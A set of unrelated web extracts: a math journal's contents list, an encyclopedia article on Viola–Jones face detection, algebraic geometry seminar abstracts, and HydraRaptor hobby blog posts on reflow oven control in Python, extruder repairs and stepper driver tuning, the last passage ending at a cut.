- P22. Schur Polynomials, Banded Toeplitz Matrices and Widom's Formula (Per Alexandersson)
- P23. A Note on Automorphisms of the Infinite-Dimensional Hypercube Graph (Mark Pankov)
- P24. Large Incidence-free Sets in Geometries (Stefaan De Winter, Jeroen Schillewaert, Jacques Verstraete)
- P25. Distance Powers and Distance Matrices of Integral Cayley Graphs over Abelian Groups (Walter Klotz, Torsten Sander)
- P26. Irreducible Cycles and Points in Special Position in Moduli Spaces for Tropical Curves (Andreas Gathmann, Franziska Schroeter)
- P27. On the Parity of Certain Coefficients for a $q$-Analogue of the Catalan Numbers (Kendra Killpatrick)
- P28. Properties of Random Difference Graphs (Christopher Ross)
- P29. Partially Ordinal Sums and $P$-partitions (Daniel K. Du, Qing-Hu Hou)
- P30. Resolving Sets and Semi-Resolving Sets in Finite Projective Planes (Tamás Héger, Marcella Takáts)
- P31. A Construction of Short Sequences Containing All Permutations of a Set as Subsequences (Sasa Radomirovic)
- P32. Identifying Vertex Covers in Graphs (Michael A Henning, Anders Yeo)
- P33. Structure of Colored Complete Graphs Free of Proper Cycles (Vincent Coll, Colton Magnant, Kathleen Ryan)
- P34. Some Convolution Identities and an Inverse Relation Involving Partial Bell Polynomials (Daniel Birmajer, Juan B. Gil, Michael D. Weiner)
- P35. The (Signless Laplacian) Spectral Radii of Connected Graphs with Prescribed Degree Sequences (Muhuo Liu)
- P36. Ramsey Numbers $R(K_3, G)$ for Graphs of Order 10 (Gunnar Brinkmann, Jan Goedgebeur, Jan-Christoph Schlage-Puchta)
- P37. The Hitting Time of Rainbow Connection Number Two (Annika Heckel, Oliver Riordan)
- P38. A Proof of Erdős-Fishburn's Conjecture for $g(6)=13$ (Wei Xianglin)
- P39. Combinatorial Expansions in $K$-Theoretic Bases (Jason Bandlow, Jennifer Morse)
- P40. Münchhausen Matrices (Michael Brand)
- P41. Counting Bases of Representable Matroids (Michael Snook)
- P43. An Ordered Turán Problem for Bipartite Graphs (Craig Timmons)
- P44. Optimal Divisibility Conditions for Loose Hamilton Cycles in Random Hypergraphs (Andrzej Dudek, Alan Frieze, Po-Shen Loh, Shelley Speiss)
- P45. Γ-Species and the Enumeration of $k$-Trees (Andrew Gainer-Dewar)
- P46. The Tau Constant and the Edge Connectivity of a Metrized Graph (Zubeyir Cinkir)
- P47. Three Color Ramsey Numbers for Graphs with at most 4 Vertices (Luis Boza, Janusz Dybizbański, Tomasz Dzido)
- P48. Further Analysis on the Total Number of Subtrees of Trees (Shuchao Li, Shujing Wang)
- P49. On Cross-Intersecting Families of Set Partitions (Cheng Yeaw Ku, Kok Bin Wong)
- P50. List-Coloring Graphs on Surfaces with Varying List-Sizes (Alice M. Dean, Joan P. Hutchinson)
- P51. On the Spanning Trees of the Hypercube and other Products of Graphs (Olivier Bernardi)
- P52. On the Number of Partition Weights with Kostka Multiplicity One (Zachary Gates, Brian Goldman, C. Ryan Vinroot)
- P53. Connectivity for Random Graphs from a Weighted Bridge-Addable Class (Colin McDiarmid)
- P54. The Number of Ways to Assemble a Graph (Andrew Vince, Miklós Bóna)
- P55. Generalized Alcuin's Sequence (Daniel Panario, Murat Sahin, Qiang Wang)
- P56. Identifying Codes of Lexicographic Product of Graphs (Min Feng, Min Xu, Kaishun Wang)

ISSN: 1077-8926
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9793187975883484, "perplexity": 12627.610570698289}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281162.88/warc/CC-MAIN-20170116095121-00264-ip-10-171-10-70.ec2.internal.warc.gz"}
https://en.wikipedia.org/wiki/Viola-Jones_object_detection_framework
# Viola–Jones object detection framework

The Viola–Jones object detection framework, proposed in 2001 by Paul Viola and Michael Jones, is the first object detection framework to provide competitive object detection rates in real time.[1][2] Although it can be trained to detect a variety of object classes, it was motivated primarily by the problem of face detection.

## Problem description

The problem to be solved is detection of faces in an image. A human can do this easily, but a computer needs precise instructions and constraints. To make the task more manageable, Viola–Jones requires full view frontal upright faces. Thus in order to be detected, the entire face must point towards the camera and should not be tilted to either side. While it seems these constraints could diminish the algorithm's utility somewhat, because the detection step is most often followed by a recognition step, in practice these limits on pose are quite acceptable.

## Components of the framework

Example rectangle features shown relative to the enclosing detection window

### Feature types and evaluation

The characteristics of the Viola–Jones algorithm which make it a good detection algorithm are:

• Robust – very high detection rate (true-positive rate) and a consistently very low false-positive rate.
• Real time – for practical applications at least 2 frames per second must be processed.
• Face detection only (not recognition) – the goal is to distinguish faces from non-faces (detection is the first step in the recognition process).

The algorithm has four stages:

1. Haar Feature Selection
2. Creating an Integral Image
3. AdaBoost Training
4. Cascading Classifiers

The features sought by the detection framework universally involve the sums of image pixels within rectangular areas. As such, they bear some resemblance to Haar basis functions, which have been used previously in the realm of image-based object detection.[3] However, since the features used by Viola and Jones all rely on more than one rectangular area, they are generally more complex. The figure on the right illustrates the four different types of features used in the framework. The value of any given feature is the sum of the pixels within clear rectangles subtracted from the sum of the pixels within shaded rectangles. Rectangular features of this sort are primitive when compared to alternatives such as steerable filters. Although they are sensitive to vertical and horizontal features, their feedback is considerably coarser.

Haar feature that looks similar to the bridge of the nose, applied onto the face
Haar feature that looks similar to the eye region, which is darker than the upper cheeks, applied onto a face
3rd and 4th kinds of Haar feature

#### Haar Features

All human faces share some similar properties. These regularities may be matched using Haar features. A few properties common to human faces:

• The eye region is darker than the upper cheeks.
• The nose bridge region is brighter than the eyes.
Composition of properties forming matchable facial features:

• Location and size: eyes, mouth, bridge of nose
• Value: oriented gradients of pixel intensities

The four features matched by this algorithm are then sought in the image of a face (shown at right).

Rectangle features:

• Value = Σ (pixels in black area) − Σ (pixels in white area)
• Three types: two-, three- and four-rectangle features; Viola and Jones used two-rectangle features
• For example: the difference in brightness between the white and black rectangles over a specific area
• Each feature is related to a special location in the sub-window

#### Summed area table

An image representation called the integral image evaluates rectangular features in constant time, which gives them a considerable speed advantage over more sophisticated alternative features. Because each feature's rectangular area is always adjacent to at least one other rectangle, it follows that any two-rectangle feature can be computed in six array references, any three-rectangle feature in eight, and any four-rectangle feature in nine.

### Learning algorithm

The speed with which features may be evaluated does not adequately compensate for their number, however. For example, in a standard 24x24 pixel sub-window, there are a total of M = 162,336[4] possible features, and it would be prohibitively expensive to evaluate them all when testing an image. Thus, the object detection framework employs a variant of the learning algorithm AdaBoost both to select the best features and to train classifiers that use them. This algorithm constructs a "strong" classifier as a linear combination of weighted simple "weak" classifiers:

$$h(\mathbf{x}) = \operatorname{sgn}\left(\sum_{j=1}^{M} \alpha_j h_j(\mathbf{x})\right)$$

Each weak classifier is a threshold function based on the feature $f_j$:

$$h_j(\mathbf{x}) = \begin{cases} -s_j & \text{if } f_j < \theta_j \\ s_j & \text{otherwise} \end{cases}$$

The threshold value $\theta_j$ and the polarity $s_j \in \pm 1$ are determined in the training, as well as the coefficients $\alpha_j$.

Here a simplified version of the learning algorithm is reported:[5]

Input: a set of N positive and negative training images with their labels $(\mathbf{x}^i, y^i)$. If image i is a face, $y^i = 1$; if not, $y^i = -1$.

1. Initialization: assign a weight $w_1^i = \frac{1}{N}$ to each image i.
2. For each feature $f_j$ with $j = 1, \ldots, M$:
   1. Renormalize the weights such that they sum to one.
   2. Apply the feature to each image in the training set, then find the optimal threshold and polarity $\theta_j, s_j$ that minimize the weighted classification error. That is
      $$\theta_j, s_j = \arg\min_{\theta, s} \sum_{i=1}^{N} w_j^i \, \varepsilon_j^i, \quad \text{where} \quad \varepsilon_j^i = \begin{cases} 0 & \text{if } y^i = h_j(\mathbf{x}^i, \theta_j, s_j) \\ 1 & \text{otherwise} \end{cases}$$
   3. Assign a weight $\alpha_j$ to $h_j$ that is inversely proportional to the error rate. In this way the best classifiers are weighted more heavily.
   4. The weights for the next iteration, i.e. $w_{j+1}^i$, are reduced for the images i that were correctly classified.
3. Set the final classifier to
   $$h(\mathbf{x}) = \operatorname{sgn}\left(\sum_{j=1}^{M} \alpha_j h_j(\mathbf{x})\right)$$

### Cascade architecture

• On average only 0.01% of all sub-windows are positive (faces).
• Equal computation time is spent on all sub-windows.
• Most time must therefore be spent only on potentially positive sub-windows.
• A simple 2-feature classifier can achieve almost a 100% detection rate with a 50% false positive rate.
• That classifier can act as a 1st layer of a series to filter out most negative windows.
• A 2nd layer with 10 features can tackle "harder" negative windows which survived the 1st layer, and so on…
• A cascade of gradually more complex classifiers achieves even better detection rates.

The evaluation of the strong classifiers generated by the learning process can be done quickly, but it isn't fast enough to run in real time. For this reason, the strong classifiers are arranged in a cascade in order of complexity, where each successive classifier is trained only on those selected samples which pass through the preceding classifiers. If at any stage in the cascade a classifier rejects the sub-window under inspection, no further processing is performed and the search continues with the next sub-window. The cascade therefore has the form of a degenerate tree. In the case of faces, the first classifier in the cascade – called the attentional operator – uses only two features to achieve a false negative rate of approximately 0% and a false positive rate of 40%.[6] The effect of this single classifier is to reduce by roughly half the number of times the entire cascade is evaluated.

In cascading, each stage consists of a strong classifier. So all the features are grouped into several stages, where each stage has a certain number of features. The job of each stage is to determine whether a given sub-window is definitely not a face or may be a face. A given sub-window is immediately discarded as not a face if it fails in any of the stages.

A simple framework for cascade training is given below:

• f = the maximum acceptable false positive rate per layer.
• d = the minimum acceptable detection rate per layer.
• Ftarget = target overall false positive rate.
• P = set of positive examples.
• N = set of negative examples.

F(0) = 1.0; D(0) = 1.0; i = 0
while F(i) > Ftarget
    increase i
    n(i) = 0; F(i) = F(i-1)
    while F(i) > f × F(i-1)
        increase n(i)
        use P and N to train a classifier with n(i) features using AdaBoost
        evaluate the current cascaded classifier on a validation set to determine F(i) and D(i)
        decrease the threshold for the ith classifier until the current cascaded classifier
            has a detection rate of at least d × D(i-1) (this also affects F(i))
    N = ∅
    if F(i) > Ftarget then
        evaluate the current cascaded detector on the set of non-face images
        and put any false detections into the set N

The cascade architecture has interesting implications for the performance of the individual classifiers. Because the activation of each classifier depends entirely on the behavior of its predecessor, the false positive rate for an entire cascade is:

$$F = \prod_{i=1}^{K} f_i.$$

Similarly, the detection rate is:

$$D = \prod_{i=1}^{K} d_i.$$

Thus, to match the false positive rates typically achieved by other detectors, each classifier can get away with having surprisingly poor performance. For example, for a 32-stage cascade to achieve a false positive rate of $10^{-6}$, each classifier need only achieve a false positive rate of about 65%.
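These product formulas are easy to sanity-check numerically. The following few lines of Python are an illustrative addition (not part of the original article) that reproduce the per-stage figures quoted here and in the next paragraph:

```python
stages = 32
f_per_stage = 0.65    # per-stage false positive rate quoted above
d_per_stage = 0.997   # per-stage detection rate quoted in the next paragraph

print(f_per_stage ** stages)   # about 1e-6: the cascade's overall false positive rate
print(d_per_stage ** stages)   # about 0.91: the cascade's overall detection rate
```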
At the same time, however, each classifier needs to be exceptionally capable if it is to achieve adequate detection rates. For example, to achieve a detection rate of about 90%, each classifier in the aforementioned cascade needs to achieve a detection rate of approximately 99.7%.[7] ## Using Viola-Jones for object tracking In videos of moving objects, one need not apply object detection to each frame. Instead, one can use tracking algorithms like the KLT algorithm to detect salient features within the detection bounding boxes and track their movement between frames. Not only does this improve tracking speed by removing the need to re-detect objects in each frame, but it improves the robustness as well, as the salient features are more resilient than the Viola-Jones detection framework to rotation and photometric changes.[8] ## References 1. ^ Rapid object detection using a boosted cascade of simple features 2. ^ 3. ^ C. Papageorgiou, M. Oren and T. Poggio. A General Framework for Object Detection. International Conference on Computer Vision, 1998 4. ^ "Viola-Jones' face detection claims 180k features". stackoverflow.com. Retrieved 2017-06-27. 5. ^ R. Szeliski, Computer Vision, algorithms and applications, Springer 6. ^ 7. ^ Torbert, Shane (2016). Applied Computer Science (2nd ed.). Springer. pp. 122–131. 8. ^ Face Detection and Tracking using the KLT algorithm
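Going back to the summed-area table described earlier, the trick is easy to reproduce. Below is a small NumPy sketch, added here for illustration (it is not code from the framework itself), that builds an integral image and evaluates one two-rectangle Haar-like feature. The article's count of six array references for a two-rectangle feature comes from sharing corners between the adjacent rectangles; the generic helper below does not exploit that and uses up to four references per rectangle.

```python
import numpy as np

def integral_image(img):
    # ii[y, x] = sum of img over all pixels above and to the left, inclusive.
    return img.cumsum(axis=0).cumsum(axis=1)

def rect_sum(ii, top, left, height, width):
    # Sum of pixels in a rectangle, using at most four integral-image lookups.
    bottom, right = top + height - 1, left + width - 1
    total = ii[bottom, right]
    if top > 0:
        total -= ii[top - 1, right]
    if left > 0:
        total -= ii[bottom, left - 1]
    if top > 0 and left > 0:
        total += ii[top - 1, left - 1]
    return total

# Hypothetical 24x24 grayscale window with random intensities.
rng = np.random.default_rng(0)
window = rng.integers(0, 256, size=(24, 24)).astype(np.int64)
ii = integral_image(window)

# A two-rectangle (horizontal) feature: one strip minus the strip below it.
feature_value = rect_sum(ii, 0, 0, 4, 8) - rect_sum(ii, 4, 0, 4, 8)
print(feature_value)
```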
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 21, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5241246223449707, "perplexity": 1488.7780033056176}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560627997533.62/warc/CC-MAIN-20190616022644-20190616044644-00128.warc.gz"}
http://algebra.msri.org/detail?seminarsid=76.0
## Arthur Ogus

Attached to a toric variety X is a topological space X_\lag on which polar coordinates are well-defined. There is a natural map X_\lag \to X, which is a kind of real blowing up and can greatly simplify singularities: X_\lag is a manifold with boundary. This technique applies also to equivariant mappings between toric varieties, and makes sense globally in the context of log geometry. Our main result says that if f: X --> Y is an exact and smooth morphism of log schemes over C, then the associated map f_\lag : X_\lag --> Y_\lag is a topological submersion whose fibers are orientable manifolds with boundary. Since the result is local, it reduces to the case of affine toric varieties, and my talk will concentrate on this case, so knowledge of log geometry will not be required. The proof depends on a new look at the moment mapping (inspired by Birch's theorem in statistics) and a way to "force" functoriality. This is joint work with Chikara Nakayama.

## Charles Crissman

It is well-known that the moduli space $M_g$ of genus-$g$ curves is unirational for $g\leq 14$. What this means in down-to-Earth terms is that these spaces have "coordinates", in the sense that there is an affine space where a generic point corresponds to a generic curve of genus $g$, and only finitely many points correspond to the same curve. As a simple example, every curve of genus 2 has an equation of the form $y^2 = x(x-1)(x-a)(x-b)(x-c)$ where $0,1,a,b,c$ are distinct. The coordinates $a,b,c$ serve as coordinates for $M_2$ in the sense above.

I will discuss how to give coordinates for curves of genus $\leq 10$ by finding nodal plane models or by finding the equations of their canonical embeddings. If time permits, I will venture into the murkier waters of genus 11-14. All necessary facts about $M_g$ will be recalled, so no expertise will be required.
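To make the genus-2 example above concrete, here is a small SymPy sketch (added for illustration; the values of a, b, c are chosen arbitrarily) which checks that the right-hand side is a quintic with distinct roots, so that $y^2 = x(x-1)(x-a)(x-b)(x-c)$ really defines a smooth genus-2 hyperelliptic curve for that choice of coordinates:

```python
import sympy as sp

x = sp.symbols('x')
a, b, c = 2, 3, 5          # any three distinct values other than 0 and 1 will do
f = x * (x - 1) * (x - a) * (x - b) * (x - c)

# A degree-5 polynomial with distinct roots (nonzero discriminant)
# gives a genus-2 hyperelliptic curve y^2 = f(x).
print(sp.degree(f, x))              # 5
print(sp.discriminant(f, x) != 0)   # True, so the roots are distinct
```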
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7874535918235779, "perplexity": 315.4108574958791}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-43/segments/1539583516117.80/warc/CC-MAIN-20181023065305-20181023090805-00152.warc.gz"}
http://hydraraptor.blogspot.fi/2009_12_01_archive.html
## Tuesday, 29 December 2009

### Cooking with HydraRaptor

I needed to assemble some PCBs recently, so I set about making a temperature controller for my SMT oven. First I had to replace the solid state relay on HydraRaptor. Solid state relays are triacs with an optically coupled input, zero crossing switching and built in snubbers. I used it for controlling a vacuum cleaner when milling. It was massively overrated but for some reason it failed some time ago. I replaced it with a cheaper one and added a varistor across the mains input to kill any transients, as that is the only explanation I can think of for the old one's demise.

The next task was to write a simple graphing program in Python. I tested it by plotting the response of my extruder heater. With bang-bang control it swings +/- 2°C with a cycle time of about ten seconds. Here is the code for the graph: -

from Tkinter import *

class Axis:
    def __init__(self, min, max, minor, major, scale):
        self.scale = scale
        self.min = min
        self.max = max
        self.minor = minor
        self.major = major

class Graph:
    def __init__(self, xAxis, yAxis):
        self.xAxis = xAxis
        self.yAxis = yAxis
        self.root = Tk()
        self.root.title("HydraRaptor")
        self.last_x = None
        frame = Frame(self.root)
        frame.pack()
        xmin = xAxis.min * xAxis.scale
        xmax = xAxis.max * xAxis.scale
        ymin = yAxis.min * yAxis.scale
        ymax = yAxis.max * yAxis.scale
        width = (xmax - xmin) + 30
        height = (ymax - ymin) + 20
        #
        # X axis
        #
        self.canvas = Canvas(frame, width = width, height = height, background = "white")
        for x in range(xmin, xmax + 1, xAxis.minor * xAxis.scale):
            self.canvas.create_line(x, ymin, x, ymax, fill = "grey")
        for x in range(xmin, xmax + 1, xAxis.major * xAxis.scale):
            self.canvas.create_line(x, ymin, x, ymax, fill = "black")
            if x == xmin:
                anchor = "nw"
            else:
                anchor = "n"
            self.canvas.create_text((x, ymax), text = x / xAxis.scale, anchor = anchor)
        #
        # Y axis
        #
        for y in range(ymin, ymax + 1, yAxis.minor * yAxis.scale):
            self.canvas.create_line(xmin, y, xmax, y, fill = "grey")
        for y in range(ymin, ymax + 1, yAxis.major * yAxis.scale):
            self.canvas.create_line(xmin, y, xmax, y, fill = "black")
            if y == ymin:
                anchor = "se"
            else:
                anchor = "e"
            self.canvas.create_text((xmin, ymax + ymin - y), text = y / yAxis.scale, anchor = anchor)
        self.canvas.pack()
        self.canvas.config(scrollregion=self.canvas.bbox(ALL))
        self.root.update()

    def scaleX(self, x):
        return x * self.xAxis.scale

    def scaleY(self, y):
        axis = self.yAxis
        return (axis.max + axis.min - y) * axis.scale

    def plot(self, line, colour = "blue"):
        for i in range(len(line) - 1):
            self.canvas.create_line(self.scaleX(line[i][0]), self.scaleY(line[i][1]),
                                    self.scaleX(line[i+1][0]), self.scaleY(line[i+1][1]), fill = colour)
        self.root.update()

    def addPoint(self, p, colour = "red"):
        x = self.scaleX(p[0])
        y = self.scaleY(p[1])
        if self.last_x != None:
            self.canvas.create_line(self.last_x, self.last_y, x, y, fill = colour)
        self.last_x = x
        self.last_y = y
        self.root.update()

    def __del__(self):
        self.root.mainloop()

The third task was to interface a thermocouple to HydraRaptor. I had a spare analogue input, so I attached one of Zach's thermocouple sensor boards to it. I tested it by attaching the thermocouple to a light bulb with Kapton tape. I then ran a program that turned the bulb on and then off and graphed the temperature response. As you can see there is a ridiculous amount of noise on the readings. I tracked this down to switching noise on HydraRaptor's 5V rail, which is generated by a simple buck converter from a 24V rail.
The AD595 datasheet claims that it has a power supply sensitivity of only 10mV/V so the error should have been a small fraction of a °C. All I can assume is that its rejection of high frequency noise is far less than its DC supply rejection. In fact, pretty much all the supply noise appears on the output. I fixed it by filtering the supply with a simple RC filter consisting of a 1K series resistor and a 22uF capacitor. I fitted these to the thermocouple board in the unused holes intended for an alarm LED and its series resistor. The power is fed in via the anode connection for the LED. It feeds the supply rail via the 1K fitted in the R1 position. The positive lead of the capacitor goes into the original +5V connection to the board. The negative lead goes to the GND connection together with the ground lead. This mod will be required whenever the 5V rail comes from a switch mode supply rather than a linear regulator. Here is the much improved graph with the filter fitted: -

The next thing I tried was bang-bang control of the oven to a fixed temperature with the thermocouple attached to a scrap PCB. No great surprise that there is massive overshoot due to the thermal lag caused by the loose coupling of the PCB to the heating elements via air. It is obvious some form of proportional control is required, so I implemented PWM control of the mains supply to the oven. As triacs don't turn off until the end of the mains cycle there is no point in varying the pulse width in less than 10ms increments (in the UK). So I implemented a simple firmware scheme where I can specify how many 10ms units to be on for out of a total period, also specified in 10ms units. Setting the period to 1 second allows the heating power to be expressed in 1% units.

My original plan was to implement a PID controller, but after examining the required soldering profile I decided a much simpler scheme would probably perform better. This is the profile for tin-lead solder that I got from an Altera application note. I mainly use leaded solder at home because the lower melt point gives a much bigger margin for error, it wets and flows a lot better, the fumes are less toxic and it doesn't grow tin whiskers. Looking at the profile you can see the times are not too critical, but the temperatures are. I reasoned I could simply apply fixed powers to get the right temperature gradient until each target temperature was reached. To get round the overshoot problem I simply measured the overshoot and subtracted it from the target temps. After a little experimenting I got this profile, which looks pretty good to me: -

The blue line is the target profile, red is actual and the green lines show the time at which each target was reached. The preheat slope and re-flow slope are simply full power until the temperature is equal to the target minus the overshoot. During the first half of the soak period I had to ramp the power from 0 to 50% to get it to turn the first corner without overshoot. When the reflow peak minus the overshoot is reached I simply turn the oven off. When it gets to the cool section I open the oven door.
Here is the code: -

from Hydra import *
from Graph import *

profile = [(10,20), (120,150), (210,180), (250,210), (330, 180), (420, 20)]

slope = 140.0 / 100
overshoot = 15.0
pre_overshoot = 25
preheat_temp = 150.0
soak_temp = 180.0
soak_time = 90.0
reflow_temp = 210.0
melt_temp = 183.0
preheat_slope = (soak_temp - preheat_temp) / soak_time

s_preheat = 1
s_soak = 2
s_reflow = 3
s_cool = 4

def interp(profile, x):
    i = 0
    while i < len(profile) - 1 and profile[i + 1][0] < x:
        i += 1
    if i == len(profile) - 1:
        return 0
    p0 = profile[i]
    p1 = profile[i+1]
    return p0[1] + (p1[1]-p0[1]) * (x - p0[0]) / (p1[0] - p0[0])

def oven_cook(profile):
    hydra = Hydra(True)
    try:
        xAxis = Axis(min = 0, max = 500, minor = 5, major = 25, scale = 2)
        yAxis = Axis(min = 10, max = 250, minor = 5, major = 20, scale = 2)
        graph = Graph(xAxis, yAxis)
        graph.plot(profile)
        t = 0
        state = s_preheat
        m_state = s_preheat
        hydra.set_mains(100,100)
        while t < xAxis.max:
            sleep(1)
            temp = hydra.get_temperature()
            print temp
            graph.addPoint((t, temp))
            #
            # Control the power
            #
            if state == s_preheat:
                if temp >= preheat_temp - pre_overshoot:
                    hydra.set_mains(0, 100)
                    t_soak = t
                    state = s_soak
            elif state == s_soak:
                power = (t - t_soak) * 100.0 / soak_time
                if power > 50:
                    power = 50
                hydra.set_mains(int(power), 100)
                if temp >= soak_temp - overshoot * preheat_slope / slope:
                    hydra.set_mains(100,100)
                    state = s_reflow
            elif state == s_reflow:
                if temp >= reflow_temp - overshoot:
                    hydra.set_mains(0,100)
                    state = s_cool
            #
            # Draw the time lines
            #
            if m_state == s_preheat:
                if temp >= preheat_temp:
                    graph.plot([(t,10), (t,temp)], "green")
                    m_state = s_soak
            elif m_state == s_soak:
                if temp >= melt_temp:
                    graph.plot([(t,10), (t,temp)], "green")
                    m_state = s_reflow
            elif m_state == s_reflow:
                if temp < melt_temp:
                    graph.plot([(t,10), (t,temp)], "green")
                    m_state = s_cool
            t += 1
        hydra.init()
    except:
        hydra.init()
        raise

oven_cook(profile)

This is the first board I soldered with it: -

All the joints were good. I had a few solder balls and some bridging but that was due to not getting the right amount of paste on each pad. I will be working on a solder paste dispenser soon! I need to do some more testing to see if the arbitrary algorithm will work with large and small boards and with inner planes, etc. It relies on the overshoot being fairly constant, although with leaded solder you have some leeway. I also want to play with PID to see if I can get a more general solution. The problem I see is that PID does not look into the future, so will always overshoot somewhat, which is exactly what you don't want. I think rather than using the angular profile, that is impossible for the oven to follow, I would have to put in a rounded curve, such as the one the oven actually follows now, as the control input.

## Monday, 21 December 2009

### Reliable extruder at last?

... well only time will tell but I have now fixed all the teething problems on my "no compromise" extruder. The first problem was it was leaking plastic. I simply tightened the thread about another quarter turn while hot. The problem started when I had to dismantle it to replace the first resistor that I damaged. When I put it back together I didn't get it tight enough as it is difficult to judge when full of plastic and hot. The seal relies on the fact that the relatively sharp edge of the stainless steel tube can bite into the softer aluminium. It seems to work when tightened enough.

The other problem was that the motor would skip steps in the middle of a build for no apparent reason.
It seems the amount of force required to extrude varies wildly for which I have no explanation, but I did find some mechanical issues that were reducing the torque available. I noticed the gear would always be in the same position when the motor skipped. I found that the grub screw was catching on the bearing housing. You would expect it just to grind the PLA away, but PLA is very hard, so it would take a very long time to do so. I increased the clearance around the wheel hub and also around the moving part of the ball bearings. Another issue was that both the worm and the gear were slightly off centre on their shafts, so when the two high points coincided they would bind. The hole in the Meccano gear is slightly bigger than the 4mm shaft it is on, not sure why. The hole I drilled in the worm is 5mm but the MakerBot motors have imperial shafts about 4.75mm, so that was even more eccentric. Added to that was the fact that the motor bracket has a slight warp to it angling the shaft down a little. All these things conspired to make it stiff to turn once per revolution. I fixed it by tightening the bottom motor screw tight and slackening the top two a little. That was enough to reliably extrude PLA. Making the motor holes into slots would make things less critical. Although the extruder was working reliably for PLA I wanted more torque in reserve, so I switched to a higher torque motor more suited to my driver chip. The Lin motor I was using was rated at 0.3Nm holding torque for 2.5A, but my controller can only manage about 1.5A without some better heatsinking. I switched to the Motion Control FL42STH47-1684A-01 which gives 0.43Nm at 1.7A. So at 1.5A I have gone from 0.18Nm to 0.4Nm, i.e. doubled the torque and also got the right shaft diameter to fit the hole I drilled in the worm. The only downside is that it is bigger and heavier, not really an issue on HydraRaptor. To give it a thorough test I printed off a couple of Mendel frame vertices. These take about 2 hours each with 0.4mm filament, 25% fill, double outline at 16mm/s, infill at 32mm/s. Six are needed in total. I still have to test it with HDPE and PCL., I know it works with ABS. ## Sunday, 13 December 2009 ### Motoring on with the A3977 Previously I have blogged about how to set up the Allegro A3977 driver chip to suit a particular motor: - hydraraptor.blogspot.com/2009/07/lessons-from-a3977 hydraraptor.blogspot.com/2009/08/motor-math hydraraptor.blogspot.com/2009/08/mixed-decay-mixed-blessing Most boards I have seen using the A3977 and similar chips just have a current adjustment, with all the other values fixed. Unless you strike lucky this is not going to allow accurate microstepping because the off time and PFD need to be adjusted to suit the motor and supply voltage. A while ago Zach sent me samples of the prototype V3 stepper controller kits and the NEMA17 motors used on the MakerBot. I made up the board using my SMT oven (pizza oven controlled by HydraRaptor, more on that later). It works well, but the initial component values are not optimum for the motor, so I decided to make a test bench from the older prototype board that I have been experimenting with. I RepRapped a chassis for it with a panel to mount some switches to vary the timing components. The chassis is one of the biggest parts I have made, not in volume, but in overall expanse. It warped a little, despite being PLA, heated bed coming soon! The switch on the left must be at least 20 years old and the one on the right more than 40 but they both still work fine. 
I save all this junk and eventually it comes in handy. I also have potentiometers on V ref and PFD, so together with a bench PSU and a signal generator I can vary every parameter. I knocked up a label on a 2D printer, it's so much easier to make this sort of thing than it was when the switches were born! Zach has updated the board to have four preset potentiometers to make it fully adjustable. There are test points to allow the pots to be set to prescribed values with a multi-meter. Vref and PFD can be measured as a voltage, but the two RT values have to be set by measuring resistance with the power off. My multimeter seems to give accurate readings of these despite them being in circuit. A good tip is to measure the resistance with both polarities and if it reads the same either way round then it is most likely the chip is not affecting the reading. So here is a list of motors and optimised settings: - ## MakerBot Kysan SKU1123029 NEMA17 This is the motor that MakerBot use for the axis drive on the Cupcake, details here. It is actually a 14V motor, so is not ideally suited to being driven from a 12V chopper drive. You normally want the motor voltage to be substantially lower than the supply. You can't run it at its full current because the duty cycle would tend to 100%. With a fixed off-time, the on-time tends towards infinity and the frequency drops into the audio range. In practice I found the maximum current at 12V was 0.3A, any higher and the microstepping waveform was distorted on the leading edge due to the current not being able to rise fast enough. To maintain the sinusoidal waveform at faster step rates requires the current to be lowered further, 0.25A gives a good compromise. It is not a bad idea to under run steppers anyway, otherwise they can get too hot for contact with plastic. I used the minimum values for CT and RT, i.e. 470pF and 12K to keep the chopping frequency as high as possible, so that it is outside of the audio range. Not only is this a good idea to keep it quiet when idling, but also you want it much higher than your stepping frequency, otherwise 